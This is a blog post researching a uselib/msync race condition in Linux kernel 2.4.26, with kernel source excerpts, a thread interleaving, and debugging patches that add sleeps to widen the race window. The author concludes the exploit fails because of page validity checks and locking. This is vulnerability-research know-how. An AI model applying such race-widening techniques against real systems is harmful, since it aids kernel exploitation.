uselib/msync exploit in kernel 2.4.26

最新推荐文章于 2022-05-13 16:10:59 发布

wangchenghku

最新推荐文章于 2022-05-13 16:10:59 发布

阅读量476

点赞数

本文链接：https://blog.csdn.net/wangchenghku/article/details/49993045

版权

Race between uselib and msync

One of the interesting features of do_brk is that it can also unmap memory, if called on a region that already posesses a mapping. Therefore, the non-sempahore-protected do_brk in the uselib system call can be used prematurely unmap an arbitrary region of process memory. This comes in handy with the system call msync.

The race window is in msync_interval:

static int msync_interval(struct vm_area_struct * vma,
	unsigned long start, unsigned long end, int flags)
{
	int ret = 0;
	struct file * file = vma->vm_file;

	if ( (flags & MS_INVALIDATE) && (vma->vm_flags & VM_LOCKED) )
		return -EBUSY;

	if (file && (vma->vm_flags & VM_SHARED)) {
		ret = filemap_sync(vma, start, end-start, flags);

		if (!ret && (flags & (MS_SYNC|MS_ASYNC))) {

			struct inode * inode = file->f_dentry->d_inode;

			down(&inode->i_sem);
			ret = filemap_fdatasync(inode->i_mapping);

munmap_back:
	vma = find_vma_prepare(mm, addr, &prev, &rb_link, &rb_parent);
	if (vma && vma->vm_start < addr + len) {
		if (do_munmap(mm, addr, len))
			return -ENOMEM;

Within do_munmap, fput is called, which nulls out f_dentry.

Let's call the address of the contents contents_addr and the address of the bss bss_addr. Our evil lib will have 1 page of contents and 1 page of bss. The interleaving is as follows:

t1: mmap 1 page at bss_addr that is backed by some file fd1
t1: uselib->mmap contents at contents_addr
t2: msync 1 page at bss_addr, SLEEP right before grabbing dentry pointer
t1: uselib->do_brk->do_munmap at bss_addr
t1: SLEEP sometime before vma_link
t2: msync comes out of sleep now and f_dentry has been nulled out

To do this, 2 sleeps are required.

find_vma() locates the first memory region whose vm_end field is greater than addr and returns the address of its descriptor. It should happen before rb_erase().

Note: Parent and child share the same mm_struct. Both zap_page_range() and filemap_sync() need to acquire the page_table_lock.

Patches for Linux/mm/mmap.c and filemap.c respectively.

--- /usr/src/kernel-source-2.4.26/mm/mmap.c	2004-02-18 08:36:32.000000000 -0500
+++ mmap.c	2015-11-28 08:57:50.232849728 -0500
@@ -19,6 +19,10 @@
 #include <asm/uaccess.h>
 #include <asm/pgalloc.h>
 
+/* sleep patch */
+#include <asm-i386/param.h>
+#include <linux/sched.h>
+
 /*
  * WARNING: the debugging will use recursive algorithms so never enable this
  * unless you know what you are doing.
@@ -965,6 +969,10 @@
 
 	npp = (prev ? &prev->vm_next : &mm->mmap);
 	free = NULL;
+	if (addr == 0x60000000 && len == 4096) {
+		set_current_state(TASK_UNINTERRUPTIBLE);
+		schedule_timeout(1 * HZ);
+	}
 	spin_lock(&mm->page_table_lock);
 	for ( ; mpnt && mpnt->vm_start < addr+len; mpnt = *npp) {
 		*npp = mpnt->vm_next;

--- /usr/src/kernel-source-2.4.26/mm/filemap.c	2004-08-24 12:46:28.000000000 -0400
+++ filemap.c	2015-11-28 08:57:57.566734808 -0500
@@ -30,6 +30,10 @@
 
 #include <linux/highmem.h>
 
+/* sleep patch */
+#include <asm-i386/param.h>
+#include <linux/sched.h>
+
 /*
  * Shared mappings implemented 30.11.1994. It's not fully working yet,
  * though.
@@ -2353,6 +2357,8 @@
 		return -EBUSY;
 
 	if (file && (vma->vm_flags & VM_SHARED)) {
+		set_current_state(TASK_UNINTERRUPTIBLE);
+		schedule_timeout(2 * HZ);
 		ret = filemap_sync(vma, start, end-start, flags);
 
 		if (!ret && (flags & (MS_SYNC|MS_ASYNC))) {

The Linux kernel uses a data-structure to keep track of each physical page frame. This data-structure is called a ‘struct page’. These ‘struct page’ objects form an array, named ‘mem_map[]’.

/boot $ grep ‘mem_map’ System.map-2.4.26

After writepage() in filemap_fdatasync, we have a valid_page check in page_cache_release():

if (!VALID_PAGE(page))
	BUG();

VALID_PAGE is a marco defined like this:

((page - mem_map) < max_mapnr)

It's impossible for our fake page to pass this check. Kernel will panic.

Possible window expansion

do_munmap has to call kmem_cache_alloc, therefore we can take advantage of the strategy used in uselib/mmap exploit.

The default allocator for this kernel version is SLAB allocator, there are kernel objects pre-allocated for vma structures. However, when all of slabs containing pre-allocated vmas are full, then the kernel need to allocate new page and create a new slab. Usually, this will return pretty fast. However, if currently no memory is available, the kernel would try to free pages and reclaim memory from caches.

On the other hand, filemap_sync scans the Page Table entries corresponding to the linear address intervals included in the memory region. For each page found, it invokes flush_tlb_page() to flush the corresponding translation lookaside buffers, and marks the page as dirty. So this window could be enlarged. Verify this by using RDTSC instruction.

Note: Most Intel CPUs support out-of-order execution of the code. This feature does not guarantee that the temporal sequence of the single compiled C instructions will respect the sequence of the instruction themselves as written in the source C file. When we call the RDTSC instruction, we pretend that that instruction will be executed exactly at the beginning and at the end of code being measured. Thus, we need to call CPUID just before both RTDSC calls to avoid out of order execution. But there is a lot of variance (in terms of clock cycles) that is intrinsically associated with the CPUID instruction execution itself. That means we lose in terms of measurement resolution when using CPUID.

Nevertheless, even if we succeed in sleeping on kmem_cache_alloc and extending the time taken by filemap_sync, do_munmap is still not able to null out f_dentry since after it wakes up from kmem_cache_alloc the lock is being held by filemap_sync.